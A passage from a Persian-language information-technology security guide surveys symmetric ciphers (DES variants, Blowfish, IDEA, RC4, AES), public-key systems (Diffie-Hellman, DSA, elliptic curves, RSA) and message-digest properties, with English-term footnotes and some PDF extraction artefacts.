ﻭﺳﻴﻌﻲ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻭ ﻧﻴﺰ ﺗﻮﺳﻂ ﭘﻮﺳﺘﺔ ﺍﻣﻦ ) ٨٦(SSHﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ .ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ،ﺩﻭﺑﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ DESﺑﺎ ﺩﻭ ﻛﻠﻴﺪ
ﺭﻣﺰ ﻣﺘﻔﺎﻭﺕ ،ﺑﺪﻟﻴﻞ ﻳﻚ ﺣﻤﻠﺔ ﻣﺘﻦﺳﺎﺩﺓ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﻣﻮﺳﻮﻡ ﺑﻪ ﺭﻭﻳﺎﺭﻭﻳﻲ ﺩﺭ ﻣﻴﺎﻥ - ٨٧ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻬﺎﺟﻢ ﻫﻤﺰﻣـﺎﻥ ﻛﻮﺷـﺶ ﻣـﻲﻛﻨـﺪ
ﻣﺘﻦ ﻣﻌﻤﻮﻟﻲ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﻤﻠﻴﺎﺕ DESﻳﮕﺎﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﻣﺘﻦ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﻤﻠﻴﺎﺕ DESﻳﮕﺎﻧـﺔ ﺩﻳﮕـﺮ ﺭﻣﺰﮔـﺸﺎﻳﻲ
ﻛﻨﺪ ﺗﺎ ﺩﺭ ﺁﻥ ﻣﻴﺎﻥ ﻳﻚ ﺗﻄﺎﺑﻖ ﭘﻴﺪﺍ ﺷﻮﺩ -ﺁﻧﻘﺪﺭ ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻭﺩ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻬﺒﻮﺩ ﻧﻤﻲﺑﺨﺸﺪ.
BlowFish
٨٨
BlowFishﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺑﻠﻮﻛﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺳﺮﻳﻊ ،ﺟﻤﻊ ﻭ ﺟﻮﺭ ،ﻭ ﺳﺎﺩﻩ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﺑﺮﻭﺱ ﺷـﻨﻴﺮ ﺍﺑـﺪﺍﻉ ﺷـﺪ .ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺩﺍﺭﺍﻱ
ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ﺑﺎ ﻃﻮﻝ ﻣﺘﻐﻴﻴﺮ ﺍﺳﺖ ﻛﻪ ﺣﺪﺍﻛﺜﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺎ ۴۴۸ﺑﻴﺖ ﺑﺮﺳـﺪ ،ﻭ ﺑـﺮﺍﻱ ﺍﺟـﺮﺍ ﺭﻭﻱ ﭘﺮﺩﺍﺯﺷـﮕﺮﻫﺎﻱ ۳۲ﺑﻴﺘـﻲ ﻭ ۶۴ﺑﻴﺘـﻲ
ﺑﻬﻴﻨﻪﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺯ ﺍﻧﺤﺼﺎﺭ ﺩﺭ ﺁﻣﺪﻩ ﻭ ﺩﺭ ﺣﻮﺯﺓ ﻣﺼﺮﻑ ﻫﻤﮕﺎﻧﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ BlowFish .ﺩﺭ
ﺑﺨﺶ ﭘﻨﺠﻢ
IDEA
٩١ ٩٠ ٨٩
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺍﺩﻩ ) (IDEAﺩﺭ ﺯﻭﺭﻳﺦ ﺳﻮﺋﻴﺲ ﺗﻮﺳﻂ ﺟﻴﻤﺰ ﺍﻝ ﻣﺎﺳﻲ ﻭ ﺯﻭﺟﻴﺎ ﻻﻱ ﭘﺪﻳـﺪ ﺁﻣﺪﻧـﺪ ﻭ ﺩﺭ ﺳـﺎﻝ
۱۹۹۰ﻋﻤﻮﻣﻲ ﺷﺪﻧﺪ IDEA .ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ۱۲۸ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﻣﺸﻬﻮﺭ PGPﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻓﺎﻳﻠﻬـﺎ ﻭ ﻧﺎﻣـﻪﻫـﺎﻱ
ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﺘﺮﻱ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺩﺭ ﺻﻔﺤﺎﺕ ۱۶۹ﺗﺎ ۱۷۶ﮐﺘﺎﺏ " (PUIS) "Practical Unix & Internet Securityﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﺁﻣﺪﻩ ﺍﺳﺖ. ۸۲
83 Data Encryption Standard
84 Electronic Frontier Foundation
85 Triple-DES
86 Secure Shell
87 Meet in the Middle
88 Bruce Schnier
89 International Data Encryption Algorithms
90 James L. Massey
91 Xuejia Lai
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٩٦
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻴﺸﺘﺮ ﺍﺯ IDEAﺗﻮﺳﻂ ﻳﻜﺴﺮﻱ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺍﻧﺤﺼﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ
ﺩﺭ ﺍﺧﺘﻴﺎﺭ Ascom–Tech AGﺩﺭ ﺳﻮﻟﻮﺗﻮﺭﻥ ﺳﻮﺋﻴﺲ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﺤﺪﻭﺩ ﺷﺪﻩ ﺍﺳﺖ.
RC4
٩٢
ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺮﻳﺎﻧﻲ ﺩﺭ ﺍﺑﺘﺪﺍ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ "ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎﻱ "RSAﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﺯ
ﻣﺤﺮﻣﺎﻧﻪ ﺗﺠﺎﺭﻱ ﻣﺨﻔﻲ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﺪ .ﺍﻟﮕﻮﺭﻳﺘﻢ ﺩﺭ ﺳﺎﻝ ۱۹۹۴ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻛﺎﺭﺑﺮ ﮔﻤﻨﺎﻡ UseNetﺍﻓﺸﺎ ﺷﺪ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳـﺪ ﻧـﺴﺒﺘﹰﺎ
ﻗﻮﻱ ﺑﺎﺷﺪ RC4 .ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﺑﻴﻦ ۱ﺗﺎ ۲۰۴۸ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ.
(AES) Rijndael
ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻮﺳﻂ ﻳﻮﻫﺎﻥ ﺩﻳﻤﻦ ٩٣ﻭ ﻭﻳﻨﺖ ﺭﻳﺠﻤﻦ ٩٤ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺩﺭ ﻣﺎﻩ ﺍﻛﺘﺒﺮ ﺳﺎﻝ ۲۰۰۰ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ
) ٩٥(NISTﺑﻌﻨﻮﺍﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺟﺪﻳﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﺸﺮﻓﺘﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﮔﺰﻳﺪﻩ ﺷﺪ Rijndeal .ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣـﺰﻱﺳـﺎﺯﻱ ﻓـﻮﻕﺍﻟﻌـﺎﺩﻩ
ﺳﺮﻳﻊ ﻭ ﺟﻤﻊ ﻭ ﺟﻮﺭ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﺑﻪ ﻃﻮﻝ ۱۲۸ﺗﺎ ۱۹۲ﻳﺎ ۲۵۶ﺑﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ.
ﺭﻣﺰﻧﮕﺎﺭﻫﺎ ﻗﺪﺭﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺑﺎ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻣﻘﺎﻳﺴﻪﺍﻱ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ .ﻭﻗﺘﻲ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻣﻨﺘﺸﺮ ﻣﻲﺷـﻮﺩ ،ﺳـﺎﻳﺮ ﺭﻣﺰﻧﮕﺎﺭﻫـﺎ
ﺑﺪﻧﺒﺎﻝ ﻧﻘﺎﻳﺺ ﻳﺎ ﺿﻌﻔﻬﺎﻱ ﺁﻥ ﻣﻲﮔﺮﺩﻧﺪ .ﺑﻪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﻨﺪ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳـﺪ ﺍﺑـﺪﺍﻉ ﻛـﺮﺩﻩﺍﻧـﺪ ﺍﻋﺘﻤـﺎﺩ ﻧﻜﻨﻴـﺪ،
ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺭﻭﺵ ﻛﺎﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺁﺷﻜﺎﺭ ﻛﻨﻨﺪ ﺷﺎﻳﺪ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺍﻋﺘﺒﺎﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ
ﻣﻲﻛﻨﺪ .ﺩﺭ ﻋﻤﻞ ﺩﻟﻴﻠﻲ ﺑﺮﺍﻱ ﻣﺨﻔﻴﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ،ﭼﺮﺍﮐﻪ ﺍﻣﻨﻴﺖ ﻭﺍﻗﻌﻲ ﺩﺭ ﺷﻔﺎﻓﻴﺖ ﺍﺳﺖ.
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺭﻙ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﺍﻧﺘﺸﺎﺭ ﻳﺎﻓﺘﻦ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻳﺎ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺿﻤﺎﻧﺖ ﻧﻤﻲﻛﻨﺪ ﻛﻪ ﻧﻘـﺎﻳﺺ
ﺁﻥ ﻳﺎﻓﺘﻪ ﺧﻮﺍﻫﻨﺪ ﺷﺪ .ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ WEPﻛﻪ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺷﺒﻜﻪﺳﺎﺯﻱ 802.11ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺑﻮﺩ ،ﺗﺎ ﭘـﻴﺶ ﺍﺯ ﺁﻧﻜـﻪ
ﻳﻚ ﻧﻘﺺ ﻣﻬﻢ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺁﻥ ﻳﺎﻓﺘﻪ ﺷﻮﺩ ﺳﺎﻟﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺖ -ﻧﻘﺺ ﺩﺭ ﺗﻤﺎﻡ ﺁﻥ ﻣﺪﺕ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ،ﻭﻟﻲ ﻫـﻴﭽﻜﺲ ﺑـﻪ
ﺍﺷﻜﺎﻟﻲ ﺑﺮﺧﻮﺭﺩ ﻧﻜﺮﺩﻩ ﺑﻮﺩ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺑﺪﻧﺒﺎﻝ ﻳﻚ ﻧﻘﺺ ﺑﮕﺮﺩﺩ.
ﻃﻮﻝ ﻛﻠﻴﺪﻫﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺑﻪ ﺍﺳﺘﺤﻜﺎﻡ ﻧﺴﺒﻲ ﻭ ﻗﺪﺭﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﭘﻲﺑﺮﺩ .ﻃﻮﻝ ﻛﻠﻴﺪ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﻫﻤﮕـﺎﻧﻲ
ﻻ ﺍﺯ ۵۱۲ﺗﺎ ۲۰۴۸ﻭ ۴۰۹۶ﺑﻴﺖ ﺍﺳﺖ ،ﻭ ﺍﻟﺒﺘﻪ ﺑﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻃـﻮﻝ ۱۰۲۴ﺑﻴـﺖ ﺑـﺮﺍﻱ ﺁﻳﻨـﺪﻩﺍﻱ ﻗﺎﺑـﻞ
ﻣﻌﻤﻮ ﹰ
ﭘﻴﺶﺑﻴﻨﻲ ﻛﺎﻓﻲ ﺍﺳﺖ .ﻓﻬﺮﺳﺖ ﺯﻳﺮ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺘﺪﺍﻭﻝ ﺍﻣﺮﻭﺯ ﺭﺍ ﺧﻼﺻﻪ ﻛﺮﺩﻩ ﺍﺳﺖ:
Diffie-Hellman
ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﻣﺒﺎﺩﻟـﺔ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﻣﻴـﺎﻥ ﻃﺮﻓﻬـﺎﻱ ﺍﺭﺗﺒـﺎﻁ Diffie-Hellman .ﺩﺭ ﺣﻘﻴﻘـﺖ ﻳـﻚ ﺭﻭﺵ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻭ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﻳﻚ ﺭﻭﺵ ﺗﻮﺳﻌﻪ ﻭ ﺗﺒﺎﺩﻝ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻙ ﺭﻭﻱ ﻳﻚ ﻛﺎﻧﺎﻝ ﺍﺭﺗﺒﺎﻃﻲ ﻫﻤﮕﺎﻧﻲ ﺍﺳـﺖ .ﺩﺭ ﻭﺍﻗـﻊ ﺩﻭ
ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﺑﺮ ﺳﺮ ﭼﻨﺪ ﻣﻘﺪﺍﺭ ﻋﺪﺩﻱ ﻣﺘﺪﺍﻭﻝ ﺗﻮﺍﻓﻖ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺁﻧﮕﺎﻩ ﻫﺮ ﻃﺮﻑ ﻳﻚ ﻛﻠﻴﺪ ﭘﺪﻳـﺪ ﻣـﻲﺁﻭﺭﺩ .ﺗﺒـﺪﻳﻼﺕ ﺭﻳﺎﺿـﻲ ﻛﻠﻴـﺪﻫﺎ
ﻣﺒﺎﺩﻟﻪ ﻣﻲﺷﻮﺩ ،ﻭ ﺁﻧﮕﺎﻩ ﻫﺮ ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻛﻠﻴﺪ ﻧﺸﺴﺖ ٩٦ﺛﺎﻟﺚ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨـﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﻣﻬـﺎﺟﻤﻲ ﻛـﻪ ﻫـﺮ ﺩﻭ ﻣﻘـﺪﺍﺭ
ﺗﺒﺎﺩﻝﺷﺪﻩ ﺭﺍ ﻣﻲﺩﺍﻧﺪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺪﺳﺖ ﺁﻳﺪ.
DSA/DSS
٩٨ ٩٧
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ) (DSSﺗﻮﺳﻂ ﺁﮊﺍﻧﺲ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ
١٠٠
ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻋﻤﻮﻣﻲ ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ ) ٩٩(FIPSﺍﻧﺘﺨـﺎﺏ ﺷـﺪ DSS .ﺑـﺮ ﺍﺳـﺎﺱ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ )(DSA
ﭘﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺍﮔﺮﭼﻪ DSAﻫﺮ ﻃﻮﻟﻲ ﺭﺍ ﺑﺮﺍﻱ ﻛﻠﻴﺪ ﻣﺠﺎﺯ ﻣﻲﺷﻤﺎﺭﺩ ،ﻭﻟﻲ ﺩﺭ DSS FIPSﻓﻘﻂ ﻛﻠﻴﺪﻫﺎﻱ ﺑﺎ ﻃﻮﻝ ﺑـﻴﻦ ۵۱۲
ﻭ ۱۰۲۴ﺑﻴﺖ ﻣﺠﺎﺯ ﻫﺴﺘﻨﺪ .ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﮔﻔﺘﻪ ﺷﺪ DSSﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﺩ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﻳـﻚ
ﻧﻮﻉ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ DSAﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ
ﻱ ﻛﻠﻴﺪ ﻫﻤﮕﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺠﺎﻱ ﺭﻭﺵ ﻗﺪﻳﻤﻲ ﺗﻮﺍﺑﻊ ﻟﮕﺎﺭﻳﺘﻤﻲ ،ﻣﺒﺘﻨﻲ ﺑﺮ ﻱ ﺭﻣﺰﮔﺬﺍﺭ ﹺ
ﻲ ﺑﻴﻀﻮﻱ ﺳﻴﺴﺘﻤﻬﺎ ﹺ ﻱ ﻣﻨﺤﻨ ﹺ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭ ﹺ
ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ ﻣﻲﺑﺎﺷﻨﺪ .ﻣﺰﻳﺖ ﻛﺎﺭﺑﺮﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻨﺤﻨﻲ ﺑﻴﻀﻮﻱ ﺍﺯ ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻧـﺸﺄﺕ ﻣـﻲﮔﻴـﺮﺩ ﻛـﻪ ﻫـﻴﭻ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﻗﺎﺑـﻞ
ﻣﺤﺎﺳﺒﻪﺍﻱ ﺑﺮﺍﻱ ﻣﺤﺎﺳﺒﺔ ﻟﮕﺎﺭﻳﺘﻤﻬﺎﻱ ﻣﻨﻔﺼﻞ ﻣﻨﺤﻨﻴﻬﺎﻱ ﺑﻴﻀﻮﻱ ﺷﻨﺎﺧﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻛﻠﻴﺪﻫﺎﻱ ﻛﻮﺗﺎﻩ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻨﺤﻨﻲ ﺑﻴﻀﻮﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭﺟﻪ ﺑﺎﻻﺋﻲ ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻪ ﺍﺭﻣﻐﺎﻥ ﺑﻴﺎﻭﺭﻧﺪ ،ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﻣﺤﺎﺳﺒﺎﺕ ﺁﻧﻬﺎ ﻫﻢ ﺑﺴﻴﺎﺭ
ﺳﺮﻳﻊ ﺍﺳﺖ .ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻛﺎﺭﺍﻳﻲ ﺑﺎﻻ ﺑﺼﻮﺭﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﻧﺪ.
RSA
RSAﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺸﻬﻮﺭ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻫﻤﮕﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﺎﻝ ۱۹۷۷ﻣﻴﻼﺩﻱ ﺗﻮﺳﻂ ﺳﻪ ﺍﺳﺘﺎﺩ ﺩﺍﻧﺸﮕﺎﻩ MITﺑﻪ ﻧﺎﻣﻬﺎﻱ ﺭﻭﻟﻨﺪ
ﺭﻳﻮﺳﺖ ،ﺍﺩﻱ ﺷﻤﻴﺮ ،١٠١ﻭ ﻟﺌﻮﻧﺎﺭﺩ ﺁﺩﻟﻤﻦ ١٠٢ﭘﺪﻳﺪ ﺁﻣﺪ .ﺍﺯ RSAﻫﻢ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻫـﻢ ﺑﻌﻨـﻮﺍﻥ ﻣﺒﻨـﺎﻱ ﻳـﻚ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺳﻴﺴﺘﻢ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﺍﺻﺎﻟﺖ ﻳﺎ ﺳﻨﺪﻳﺖ ﺍﻃﻼﻋﺎﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﻧـﺪ .ﺩﺭ
ﺍﻳﻦ ﺳﻴﺴﺘﻢ ،ﻛﻠﻴﺪ ﺭﻣﺰ ﺑﺴﺘﻪ ﺑﻪ ﻧﻮﻋﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻫﺮ ﻃﻮﻟﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ
ﻻ ۱۲۸ﺗﺎ ۲۵۶ﺑﻴـﺖ ﻃـﻮﻝ
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﻳﻚ ﻓﺎﻳﻞ )ﺑﺰﺭﮒ ﻳﺎ ﻛﻮﭼﻚ( ﺭﺍ ﺑﻪ ﻳﻚ ﻋﺪﺩ ﺑﺰﺭﮒ ﺗﺒﺪﻳﻞ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺩﺍﺭﺩ .ﺑﻬﺘﺮﻳﻦ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻭﺍﺟﺪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺯﻳﺮ ﻫﺴﺘﻨﺪ:
ﺍﻟﻒ( ﻫﺮ ﺑﻴﺖ ﺧﺮﻭﺟﻲ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺼﻮﺭﺕ ﺑﺎﻟﻘﻮﻩ ﺗﺤﺖﺗﺄﺛﻴﺮ ﻫﻤﺔ ﺑﻴﺘﻬﺎﻱ ﻭﺭﻭﺩﻱ ﺗﺎﺑﻊ ﺍﺳﺖ.
ﺏ( ﺍﮔﺮ ﻳﻚ ﺑﻴﺖ ﻣﻔﺮﻭﺽ ﻭﺭﻭﺩﻱ ﺗﺎﺑﻊ ﺗﻐﻴﻴﺮ ﻛﻨﺪ ،ﻫﺮ ﺑﻴﺖ ﺧﺮﻭﺟﻲ ﺗﺎﺑﻊ ۵۰ﺩﺭﺻﺪ ﺷﺎﻧﺲ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻥ ﺩﺍﺭﺩ.
